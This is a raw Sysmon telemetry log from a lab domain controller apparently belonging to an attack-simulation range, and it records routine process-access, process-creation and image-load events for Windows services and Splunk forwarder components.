13:10:55.844{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-42DF-6000-9600-000000009A01}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42DF-6000-9600-000000009A01}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-42DF-6000-9600-000000009A01}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.816{08A6967A-42E0-6000-9700-000000009A01}49724964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42E0-6000-9700-000000009A01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-42E0-6000-9700-000000009A01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.675{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42E0-6000-9700-000000009A01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:56.676{08A6967A-42E0-6000-9700-000000009A01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x80000000000000003141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.866{08A6967A-4298-6000-3100-000000009A01}2248C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000003140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.427{08A6967A-42E1-6000-9800-000000009A01}50045008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42E1-6000-9800-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 